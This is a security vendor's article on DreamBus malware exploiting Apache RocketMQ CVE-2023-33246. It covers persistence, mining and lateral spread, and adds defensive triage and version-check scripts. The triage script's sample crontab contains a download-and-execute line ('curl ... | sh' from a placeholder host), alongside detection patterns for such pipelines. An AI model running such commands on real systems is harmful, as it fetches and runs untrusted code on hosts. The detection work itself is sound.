Heimdal

Threat actors are exploiting a known remote code execution vulnerability in Apache RocketMQ servers to infect them with the DreamBus malware.

CVE-2023-33246 was disclosed in May 2023 and carries a CVSS score of 9.8, which rates it as critical. It is a missing permission verification issue in Apache RocketMQ that affects versions 5.1.0 and below: an attacker who can reach an exposed broker can abuse its configuration update function to execute commands as the RocketMQ system user, without authenticating first.

How DreamBus Malware Exploits the RocketMQ Vulnerability

According to researchers, DreamBus started exploiting CVE-2023-33246 in June 2023. The attackers probed RocketMQ’s default port 10911 and seven other ports. To identify vulnerable hosts they used interactsh, a free, open-source out-of-band interaction tool: a server that executes the probe calls back to the attackers’ interactsh endpoint, confirming it is unpatched, and those servers became the targets.

Once a vulnerable server is found, the attackers fetch a bash script named ‘reketed’ through a Tor proxy service, which also helps them avoid detection: when the researchers analysed it, no antivirus engine flagged the script.

‘reketed’ acts as the downloader and installer for the DreamBus main module, an ELF binary. Once that binary is running, it deletes its own file from disk to hinder detection and forensic analysis.

Custom UPX packing also helps the main module evade the antivirus engines on VirusTotal.

DreamBus also carries several base64-encoded scripts that download further components.

Among the tasks these additional components perform are:

  • downloading the XMRig Monero miner,
  • running more bash scripts,
  • deploying a new version of the malware.

The malware establishes persistence on the infected host by installing a systemd service and a cron job that runs once an hour.

DreamBus also spreads laterally by abusing fleet-management and parallel SSH tools it finds on the host (Ansible, Chef’s knife, SaltStack’s salt and pssh), which can run commands on every machine they manage, and it bundles a vulnerability scanner that looks for further targets.
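The persistence and spreading behaviours described above translate into host-level indicators that are straightforward to hunt for. The following Python script is an added example, not code from Heimdal or from the researchers who analysed DreamBus: it checks a crontab, systemd unit files and a process listing for an hourly job or service that runs from scratch space or pipes a download into a shell, a running process whose ELF has been unlinked from disk, an xmrig process, and fleet tools (ansible, knife, salt, pssh) launched under a service account. Every indicator list, path and sample record is constructed for the example; tune them to your environment.

```python
"""Host triage for the DreamBus behaviours described above: hourly cron job,
systemd service, self-deleting ELF main module, XMRig miner and lateral
movement via ansible/knife/salt/pssh.  Added example, not code from Heimdal
or the DreamBus researchers; indicators, paths and samples are constructed."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "source severity detail")

# Fleet-management / parallel-SSH tools DreamBus is reported to abuse.
SPREAD_TOOLS = {"ansible", "ansible-playbook", "knife", "salt", "salt-ssh", "pssh"}
MINER_NAMES = {"xmrig"}
# Service accounts that have no business driving fleet tooling (assumed set).
SERVICE_ACCOUNTS = {"rocketmq", "www-data", "nobody"}
# World-writable scratch space a legitimate persistent service rarely runs from.
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# curl/wget piped into a shell, or an inline base64 decode.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)\b")


def suspicious_command(cmd: str) -> bool:
    return cmd.startswith(SUSPICIOUS_DIRS) or bool(DOWNLOAD_EXEC.search(cmd))


def triage_crontab(text: str) -> list:
    """Flag cron entries that run from scratch space or download-and-execute.
    A fixed minute with '*' in the hour field (an hourly job) raises severity."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)      # m h dom mon dow command
        if len(fields) < 6:               # @hourly-style shortcuts are skipped
            continue
        minute, hour, cmd = fields[0], fields[1], fields[5]
        if suspicious_command(cmd):
            hourly = minute.isdigit() and hour == "*"
            findings.append(Finding("crontab", "high" if hourly else "medium", cmd))
    return findings


def triage_unit(name: str, text: str) -> list:
    """Flag a systemd unit whose ExecStart lives in scratch space or wraps a
    download/decode pipeline."""
    findings = []
    for line in text.splitlines():
        if line.startswith("ExecStart="):
            cmd = line.split("=", 1)[1].strip().lstrip("-@+!:")   # systemd prefixes
            if suspicious_command(cmd):
                findings.append(Finding("unit:" + name, "high", cmd))
    return findings


def triage_processes(procs: list) -> list:
    """procs: dicts with user, pid, exe (readlink of /proc/<pid>/exe) and args.
    '(deleted)' on the exe link matches the self-deleting main module, xmrig
    is the miner, and fleet tools under a service account suggest spreading."""
    findings = []
    for p in procs:
        tool = p["args"].split()[0].rsplit("/", 1)[-1]
        if p["exe"].endswith("(deleted)"):
            findings.append(Finding(f"pid:{p['pid']}", "high", "binary unlinked: " + p["exe"]))
        if tool in MINER_NAMES:
            findings.append(Finding(f"pid:{p['pid']}", "high", "miner: " + p["args"]))
        if tool in SPREAD_TOOLS and p["user"] in SERVICE_ACCOUNTS:
            findings.append(Finding(f"pid:{p['pid']}", "medium", f"{tool} run by {p['user']}"))
    return findings


# Constructed sample inputs (not real artefacts).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
17 * * * * /tmp/.X11-unix/sysupd >/dev/null 2>&1
*/30 * * * * curl -fsSL http://example.invalid/r.sh | sh
"""
SAMPLE_UNITS = {
    "sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "sysupd.service": "[Service]\nExecStart=-/tmp/.X11-unix/sysupd\nRestart=always\n",
}
SAMPLE_PROCS = [
    {"user": "root", "pid": 812, "exe": "/usr/sbin/sshd", "args": "/usr/sbin/sshd -D"},
    {"user": "rocketmq", "pid": 2044, "exe": "/tmp/.X11-unix/sysupd (deleted)", "args": "/tmp/.X11-unix/sysupd"},
    {"user": "rocketmq", "pid": 2051, "exe": "/tmp/.X11-unix/xmrig", "args": "/tmp/.X11-unix/xmrig -o pool.invalid:3333"},
    {"user": "rocketmq", "pid": 2060, "exe": "/usr/bin/python3", "args": "/usr/bin/pssh -h /tmp/hosts -l root -i uptime"},
]


def triage_host(crontab=SAMPLE_CRONTAB, units=SAMPLE_UNITS, procs=SAMPLE_PROCS) -> list:
    findings = triage_crontab(crontab)
    for name, text in units.items():
        findings += triage_unit(name, text)
    return findings + triage_processes(procs)


if __name__ == "__main__":
    for f in triage_host():
        print(f"[{f.severity}] {f.source}: {f.detail}")
```

On a real host, feed it the output of `crontab -l` and the files under `/etc/cron.d`, the unit files under `/etc/systemd/system`, and a walk of `/proc/<pid>/exe` and `/proc/<pid>/cmdline`; the `(deleted)` suffix on the exe symlink is the kernel’s own marker for an executable that has been unlinked while running, which is exactly what a self-deleting main module leaves behind.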

The Risks of DreamBus Malware Infection

For now, the DreamBus campaign appears to be focused on Monero mining. The malware’s modular, multi-stage design, however, would let its operators switch to other payloads and expand their capabilities with little effort.

Apache RocketMQ is a free, open-source distributed messaging and streaming platform built for messaging applications. Companies reported to use it include TikTok, Huawei Technologies and Alibaba Group.

Companies rely on RocketMQ brokers to carry messages between their applications. An attacker who exploits CVE-2023-33246 on an unpatched server therefore gains code execution on the broker itself and could access the sensitive message data passing through it, not just install a miner.

DreamBus Malware Attacks Prevention Measures

To avoid becoming a DreamBus victim, upgrade RocketMQ to version 5.1.1 or later (4.9.6 or later on the 4.x branch) and do not expose the NameServer or broker ports to the internet. An automated patch management solution keeps all software up to date with minimal effort from the security team.
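A quick way to check a deployment against both the vulnerable version range described at the top of the article and the port exposure the attackers relied on, as an added example (not Heimdal’s or the Apache RocketMQ project’s code): the version thresholds are the fixed releases 5.1.1 and 4.9.6, the port list uses RocketMQ’s documented defaults (9876 NameServer, 10911 broker, 10909 VIP channel, 10912 HA), and the `ss -lntp` output is a constructed sample.

```python
"""Check a RocketMQ host for CVE-2023-33246 exposure: is the running version in
the affected range, and are RocketMQ ports bound to a wildcard address?
Added example; not code from Heimdal or the Apache RocketMQ project."""
import re

# Last vulnerable release on each maintained branch (fixed in 5.1.1 and 4.9.6).
LAST_VULNERABLE = {5: (5, 1, 0), 4: (4, 9, 5)}

# RocketMQ default listeners: 9876 NameServer, 10911 broker remoting,
# 10909 broker VIP channel, 10912 broker HA.  Adjust to your broker.conf.
ROCKETMQ_PORTS = {9876, 10909, 10911, 10912}
WILDCARD_ADDRS = {"0.0.0.0", "::", "*"}


def parse_version(version: str) -> tuple:
    """'5.1.0', 'v4.9.4' or '5.1.1-SNAPSHOT' -> (major, minor, patch)."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised RocketMQ version: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(version: str) -> bool:
    """True when the version is at or below the last unpatched release of its
    branch.  Branches older than 4.x never received a fix, so anything below
    4.9.6 is treated as vulnerable (conservative assumption)."""
    v = parse_version(version)
    last = LAST_VULNERABLE.get(v[0])
    return v <= last if last else v < (4, 9, 6)


def exposed_rocketmq_sockets(ss_output: str) -> list:
    """Parse `ss -lntp` output and return (port, address) pairs for RocketMQ
    ports bound to a wildcard address, i.e. reachable from every interface."""
    exposed = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        addr, _, port = parts[3].rpartition(":")   # '0.0.0.0:10911', '[::]:10911'
        if (port.isdigit() and int(port) in ROCKETMQ_PORTS
                and addr.strip("[]") in WILDCARD_ADDRS):
            exposed.append((int(port), addr))
    return exposed


def assess(version: str, ss_output: str) -> dict:
    """Combine both checks; the host needs attention if either result is set."""
    return {
        "vulnerable_version": is_vulnerable_version(version),
        "exposed_ports": sorted(p for p, _ in exposed_rocketmq_sockets(ss_output)),
    }


# Constructed sample of `ss -lntp` on a broker host (not real data).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:10911       0.0.0.0:*         users:(("java",pid=1337,fd=123))
LISTEN 0      128    0.0.0.0:9876        0.0.0.0:*         users:(("java",pid=1336,fd=101))
LISTEN 0      128    127.0.0.1:10909     0.0.0.0:*         users:(("java",pid=1337,fd=124))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=800,fd=3))
"""

if __name__ == "__main__":
    print(assess("5.1.0", SAMPLE_SS))   # {'vulnerable_version': True, 'exposed_ports': [9876, 10911]}
```

The version string can be read from the broker’s startup log or its `mqadmin` output; a broker whose ports are bound only to an internal interface and fronted by a firewall is still vulnerable until patched, but it is not reachable by the internet-wide scanning this campaign used.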

Heimdal®’s 3rd Party Patch Management monitors and patches in time any 3rd Party Application a company might use. In addition, the Infinity Management module offers even more flexibility. On Windows, security teams can use Infinity Management to:

  • Automatically install 3rd Party Applications that Heimdal Security does not manage,
  • Automatically update 3rd Party Applications added in the Infinity Management module,
  • Let users manually install 3rd Party Applications visible in the Heimdal

The module can also be used on Linux, to automatically:

  • Install 3rd Party Applications that Heimdal Security does not yet manage,
  • Update 3rd Party Applications that were added in the Infinity Management module.

Thus, security admins can make sure that all software running on the company’s assets is properly patched and safe.

Author Profile

Livia Gyongyoși

Communications and PR Officer

Livia Gyongyoși is a Communications and PR Officer within Heimdal®, passionate about cybersecurity. Always interested in being up to date with the latest news regarding this domain, Livia's goal is to keep others informed about best practices and solutions that help avoid cyberattacks.
